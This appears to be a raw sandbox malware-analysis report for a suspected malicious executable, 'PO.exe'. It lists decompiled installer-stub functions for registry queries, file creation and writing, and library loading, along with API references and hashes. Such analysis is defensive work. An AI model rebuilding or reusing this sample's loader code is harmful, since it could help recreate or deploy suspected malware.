0x00403166
0x0040316d
0x00403170
0x00403172
0x00403172
0x0040317f
0x00403182
0x00403189
0x00000000
0x00000000
0x00403192
0x00403199
0x004031b1
0x004031db
0x004031db
0x0040319b
0x0040319b
0x0040319e
0x004031a1
0x004031a7
0x004031ad
0x00000000
0x004031af
0x00000000
0x004031af
0x004031ad
0x00000000
0x00403199
0x00000000
0x00403166
0x0040315b
0x00403156
0x0040314d
0x00403134
0x004031e9
0x004031ec

APIs

SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
Instruction ID: 040f2acbe5348ef8c996952313d322865bd2faa87b76d8d9ba7109e69b0e4b3d
Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
Instruction Fuzzy Hash: 22316B30200219EBDB108F55ED84ADA3F68EB08359F20813AF905EA1D0DB79DF50DBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040242A Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E0040242A(int* __ebx, char* __esi) {
				void* _t17;
				short* _t18;
				long _t21;
				void* _t33;
				void* _t37;
				void* _t40;

				_t35 = __esi;
				_t27 = __ebx;
				_t17 = E00402CC9(_t40, 0x20019); // executed
				_t33 = _t17;
				_t18 = E00402BBF(0x33);
				 *__esi = __ebx;
				if(_t33 == __ebx) {
					 *(_t37 - 4) = 1;
				} else {
					 *(_t37 - 0x34) = 0x800;
					_t21 = RegQueryValueExW(_t33, _t18, __ebx, _t37 + 8, __esi, _t37 - 0x34); // executed
					if(_t21 != 0) {
						L7:
						 *_t35 = _t27;
						 *(_t37 - 4) = 1;
					} else {
						if( *(_t37 + 8) == 4) {
							__eflags =  *(_t37 - 0x1c) - __ebx;
							 *(_t37 - 4) = 0 |  *(_t37 - 0x1c) == __ebx;
							E004060C5(__esi,  *__esi);
						} else {
							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
								 *(_t37 - 4) =  *(_t37 - 0x1c);
								_t35[0x7fe] = _t27;
							} else {
								goto L7;
							}
						}
					}
					_push(_t33); // executed
					RegCloseKey(); // executed
				}
				 *0x42a2c8 =  *0x42a2c8 +  *(_t37 - 4);
				return 0;
			}

0x0040242a
0x0040242a
0x0040242f
0x00402436
0x00402438
0x0040243f
0x00402442
0x0040281e
0x00402448
0x0040244b
0x0040245b
0x00402466
0x00402496
0x00402496
0x00402499
0x00402468
0x0040246c
0x00402485
0x0040248c
0x0040248f
0x0040246e
0x00402471
0x0040247c
0x004024ee
0x00000000
0x00000000
0x00000000
0x00402471
0x0040246c
0x004024f5
0x004024f6
0x004024f6
0x00402a4f
0x00402a5b

APIs

Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00001106,00000000,00000022,00000000,?,?), ref: 00402CF1

RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsr9735.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID:
API String ID: 3677997916-0
Opcode ID: fc0d1c261dc6cec8aab40022b61e73a429ebd427b24909dc8865f45a7e4b999a
Instruction ID: a4ed2935f8c713a64b441f8b02302a8faa8aa65f3841d01997d269d515fb9b23
Opcode Fuzzy Hash: fc0d1c261dc6cec8aab40022b61e73a429ebd427b24909dc8865f45a7e4b999a
Instruction Fuzzy Hash: 9D119131911205EBDB10CFA0CA489AEB7B4EF44354B20843FE446B72D0D6B85A41DB19

Uniqueness

Uniqueness Score: -1.00%

Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E00401389(signed int _a4) {
				intOrPtr* _t6;
				void* _t8;
				void* _t10;
				signed int _t11;
				void* _t12;
				signed int _t16;
				signed int _t17;
				void* _t18;

				_t17 = _a4;
				while(_t17 >= 0) {
					_t6 = _t17 * 0x1c +  *0x42a270;
					if( *_t6 == 1) {
						break;
					}
					_push(_t6); // executed
					_t8 = E00401434(); // executed
					if(_t8 == 0x7fffffff) {
						return 0x7fffffff;
					}
					_t10 = E0040136D(_t8);
					if(_t10 != 0) {
						_t11 = _t10 - 1;
						_t16 = _t17;
						_t17 = _t11;
						_t12 = _t11 - _t16;
					} else {
						_t12 = _t10 + 1;
						_t17 = _t17 + 1;
					}
					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
						 *0x42922c =  *0x42922c + _t12;
						SendMessageW( *(_t18 + 0x18), 0x402, MulDiv( *0x42922c, 0x7530,  *0x429214), 0); // executed
					}
				}
				return 0;
			}

0x0040138a
0x004013fa
0x0040139b
0x004013a0
0x00000000
0x00000000
0x004013a2
0x004013a3
0x004013ad
0x00000000
0x00401404
0x004013b0
0x004013b7
0x004013bd
0x004013be
0x004013c0
0x004013c2
0x004013b9
0x004013b9
0x004013ba
0x004013ba
0x004013c9
0x004013cb
0x004013f4
0x004013f4
0x004013c9
0x00000000

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406558 Relevance: 3.0, APIs: 2, Instructions: 22
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406558(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a410);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a410));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a414));
				}
				_t5 = E004064E8(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}

0x00406560
0x00406563
0x0040656a
0x00406572
0x0040657e
0x00000000
0x00406585
0x00406575
0x0040657c
0x00000000
0x0040658d
0x00000000

APIs

GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
GetProcAddress.KERNEL32(00000000,?), ref: 00406585

Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
Part of subcall function 004064E8: LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 0040654E

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction ID: 8c1a5bb66f910ccc430fc34c4425cef617f316e2833151c7c1ff8c8a0ee84b40
Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
Instruction Fuzzy Hash: C3E086326042206BD6105B706E0893762BC9ED8740302483EF946F2084D778DC329A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401DDC Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000,00000001), ref: 00401DF2
EnableWindow.USER32(00000000,00000000), ref: 00401DFD

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: Window$EnableShow
String ID:
API String ID: 1136574915-0
Opcode ID: dfe498c59e1a90f19dc21fe6b85702c545f727acc85ba8b066617fafdbc62111
Instruction ID: 21ddd3577add1129786b8edf5e015a7aca6159172531db4ba1f8ff50d12c07f3
Opcode Fuzzy Hash: dfe498c59e1a90f19dc21fe6b85702c545f727acc85ba8b066617fafdbc62111
Instruction Fuzzy Hash: D3E08C326005009BCB20AFB5AA4999D3375EF50369710017BE402F10E1CABC9C408A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D53 Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405D53(WCHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesW(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileW(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405d57
0x00405d64
0x00405d79
0x00405d7f

APIs

GetFileAttributesW.KERNELBASE(00000003,00402E84,C:\Users\user\Desktop\PO.exe,80000000,00000003), ref: 00405D57
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19

Uniqueness

Uniqueness Score: -1.00%

Function 00405D2E Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D2E(WCHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesW(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesW(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405d33
0x00405d39
0x00405d3e
0x00405d47
0x00405d47
0x00405d50

APIs

GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D47

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction ID: 62c1218995ad43f24aa052634507c0d83541fa9dca801c4eab67991220ff17ac
Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
Instruction Fuzzy Hash: 40D01272504520AFC2513738EF0C89BBF95EB543B17028B35FAF9A22F0DB304C568A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405829 Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405829(WCHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryW(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x0040582f
0x00405837
0x00000000
0x0040583d
0x00000000

APIs

CreateDirectoryW.KERNELBASE(?,00000000,004033A9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035DE), ref: 0040582F
GetLastError.KERNEL32 ref: 0040583D

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction ID: d963a2520b22da8993c1f0374a54a6368e12bf2bf52e26206a68f99a8800bbf8
Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
Instruction Fuzzy Hash: 1DC04C31204B029AD7506B609F097177954AB50781F11C8396946E00A0DE348465DE2D

Uniqueness

Uniqueness Score: -1.00%

Function 0040229D Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040229D(int __eax, WCHAR* __ebx) {
				WCHAR* _t11;
				WCHAR* _t13;
				void* _t17;
				int _t21;

				_t11 = __ebx;
				_t5 = __eax;
				_t13 = 0;
				if(__eax != __ebx) {
					__eax = E00402BBF(__ebx);
				}
				if( *((intOrPtr*)(_t17 - 0x28)) != _t11) {
					_t13 = E00402BBF(0x11);
				}
				if( *((intOrPtr*)(_t17 - 0x1c)) != _t11) {
					_t11 = E00402BBF(0x22);
				}
				_t5 = WritePrivateProfileStringW(0, _t13, _t11, E00402BBF(0xffffffcd)); // executed
				_t21 = _t5;
				if(_t21 == 0) {
					 *((intOrPtr*)(_t17 - 4)) = 1;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x0040229d
0x0040229d
0x0040229f
0x004022a3
0x004022a6
0x004022ab
0x004022b0
0x004022b9
0x004022b9
0x004022be
0x004022c7
0x004022c7
0x004022d4
0x004015ac
0x004015ae
0x0040281e
0x0040281e
0x00402a4f
0x00402a5b

APIs

WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: PrivateProfileStringWrite
String ID:
API String ID: 390214022-0
Opcode ID: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
Instruction ID: a822d11f1d05533bca3208a69e79300e3559a9020bae074bf72d5f6ed1f8f9d7
Opcode Fuzzy Hash: 014b14aad264ab3d9278ecb8b720997d0a3792ab61640f4b6d401bffeacc1512
Instruction Fuzzy Hash: BCE04F319001246ADB113EF10E8ED7F31695B40314B1405BFB551B66C6D9FC0D4246A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040172D Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040172D() {
				long _t5;
				WCHAR* _t8;
				WCHAR* _t12;
				void* _t14;
				long _t17;

				_t5 = SearchPathW(_t8, E00402BBF(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
				_t17 = _t5;
				if(_t17 == 0) {
					 *((intOrPtr*)(_t14 - 4)) = 1;
					 *_t12 = _t8;
				}
				 *0x42a2c8 =  *0x42a2c8 +  *((intOrPtr*)(_t14 - 4));
				return 0;
			}

0x00401741
0x00401747
0x00401749
0x004027ec
0x004027f3
0x004027f3
0x00402a4f
0x00402a5b

APIs

SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401741

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189321768.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189353220.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189378354.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189425141.0000000000469000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189455524.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189482748.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189560743.000000000047C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO.jbxd

Similarity

API ID: PathSearch
String ID:
API String ID: 2203818243-0
Opcode ID: a9dd0df3727c943d88a13623224aaf6d177280fc7f388cb898e09bc2231a027b
Instruction ID: 9d0666dde0d895d2acfda9375e79d31dc3107899110506874ca2c1483bba1856
Opcode Fuzzy Hash: a9dd0df3727c943d88a13623224aaf6d177280fc7f388cb898e09bc2231a027b
Instruction Fuzzy Hash: 2DE08676300100EBD750CFA4DE49AAA77ADDF40378F20417BF615E61D1E6B49A41973D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E05 Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E05(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e09
0x00405e19
0x00405e21
0x00000000
0x00405e28
0x00000000
0x00405e2a

APIs

WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414485,0040CED0,004032EF,0040CED0,00414485,00414ED0,00004000,?,00000000,00403119,00000004), ref: 00405E19

Memory Dump Source

Source File: 00000001.00000002.85189013705.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.85188944521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189104391.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189148344.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.85189298198.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
